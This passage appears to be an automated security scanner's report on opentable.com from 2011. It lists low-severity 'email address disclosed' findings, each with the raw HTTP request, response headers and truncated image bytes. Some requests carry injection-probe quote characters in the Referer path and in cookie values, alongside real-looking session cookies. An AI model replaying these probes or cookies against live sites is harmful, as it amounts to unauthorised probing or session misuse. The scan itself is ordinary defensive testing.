User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 104
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:29 GMT

GIF89a.............y.e[K>./*.........!.......,..........-h&CU.....e....V.u_...)zX.b..B1....M.Kh..%21$..;

8.43. http://www.opentable.com/img/dnbase/dotrul.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/dotrul.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/dotrul.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:06 GMT

GIF89a.......XX@...!.......,...........DR.;

8.44. http://www.opentable.com/img/dnbase/dotrul_706.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/dotrul_706.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/dotrul_706.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 134
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:56:41 GMT

GIF89a..........baJ......XX@y.e......!.......,..........K.UZ...)k......`.~bI.cj........<X7......YA.x.q.....-......2!.....^._.........;

8.45. http://www.opentable.com/img/icons/FaceBook_24x24.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/icons/FaceBook_24x24.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/icons/FaceBook_24x24.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1147
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:06 GMT

.PNG
.
...IHDR..............w=....BIDATH....o.U..?..;...kK. ..DZ....B.M.@..c..........n..r.......FC.....1.............{.....e!z.sof..~..{..+.........k/.#..#.>.........[.x....!..;..CO.y.7.>3.c...Y
...[SNIP]...

8.46. http://www.opentable.com/img/icons/Twitter_24x24.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/icons/Twitter_24x24.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/icons/Twitter_24x24.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1266
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:06 GMT

.PNG
.
...IHDR..............w=.....IDATH......E....U..M{z..`y=.!.o..-..V..^wA......+..'..8 .......BB..`...]c...e..k..0...]....!..3....U.U]..._D..<x.;...x...n..R4.Ah......N.....,1...']8.7{..Ob..w.5
...[SNIP]...

8.47. http://www.opentable.com/img/info/DiningRewards.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/info/DiningRewards.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/info/DiningRewards.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3532
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:09 GMT

GIF89aH.H.......................44...................)).............[[..........SS............................rr.......................................................aa................<<.............
...[SNIP]...

8.48. http://www.opentable.com/img/info/Zagat_Affiliate_Page2.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/info/Zagat_Affiliate_Page2.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /img/info/Zagat_Affiliate_Page2.PNG HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5908
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:08 GMT

.PNG
.
...IHDR.......w......B.z....gAMA......a.....IDATx^.....E...?.....[...q.kuA.......1......F.....D.`$.E... (D ..&""..A$$b.[..NuwuuO..;....=.vWW?.........?P.
@.(.C.^{..s..?...P.
@..)....w4dp.
@.
...[SNIP]...

8.49. http://www.opentable.com/img/inputfield-down-arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/inputfield-down-arrow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/inputfield-down-arrow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 59
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

GIF89a............!.......,....................j.}9..>..;

8.50. http://www.opentable.com/img/logos/opentable_logo_reg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/logos/opentable_logo_reg.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/logos/opentable_logo_reg.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5305
Content-Type: image/png
Last-Modified: Tue, 22 Sep 2009 22:11:00 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:56:42 GMT

.PNG
.
...IHDR.......".......wi...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.51. http://www.opentable.com/img/logos/sh_en_safeharborlogo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/logos/sh_en_safeharborlogo.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/logos/sh_en_safeharborlogo.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 20919
Content-Type: image/jpeg
Last-Modified: Tue, 21 Apr 2009 18:56:14 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:42 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................R....
...[SNIP]...

8.52. http://www.opentable.com/img/privatediningimages/200-200_Golden%20Gate%20Room.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/privatediningimages/200-200_Golden%20Gate%20Room.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/privatediningimages/200-200_Golden%20Gate%20Room.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 32889
Content-Type: image/jpeg
Last-Modified: Tue, 15 Dec 2009 22:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

......JFIF.....`.`.....C....................................................................C............................................................................"..............................
...[SNIP]...

8.53. http://www.opentable.com/img/privatediningimages/200-634353727080820434-0_Orpheum_Banquet_340x226_72dpi.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/privatediningimages/200-634353727080820434-0_Orpheum_Banquet_340x226_72dpi.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/privatediningimages/200-634353727080820434-0_Orpheum_Banquet_340x226_72dpi.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 9250
Content-Type: image/jpeg
Last-Modified: Fri, 11 Mar 2011 00:58:13 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."..............................
...[SNIP]...

8.54. http://www.opentable.com/img/privatediningimages/200-634499711498151079-5976432047_d8d9a5ed37_o.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/privatediningimages/200-634499711498151079-5976432047_d8d9a5ed37_o.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/privatediningimages/200-634499711498151079-5976432047_d8d9a5ed37_o.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 8622
Content-Type: image/jpeg
Last-Modified: Thu, 29 Sep 2011 13:22:03 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."..............................
...[SNIP]...

8.55. http://www.opentable.com/img/restProfile/OffersBGCenterSolidGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/OffersBGCenterSolidGray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/OffersBGCenterSolidGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3601
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

.PNG
.
...IHDR.............u..7...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.56. http://www.opentable.com/img/restProfile/OffersBGSolidGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/OffersBGSolidGray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/OffersBGSolidGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3907
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

.PNG
.
...IHDR... ...L......p#....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.57. http://www.opentable.com/img/restProfile/ToolBar8bitGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/ToolBar8bitGray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/ToolBar8bitGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3754
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
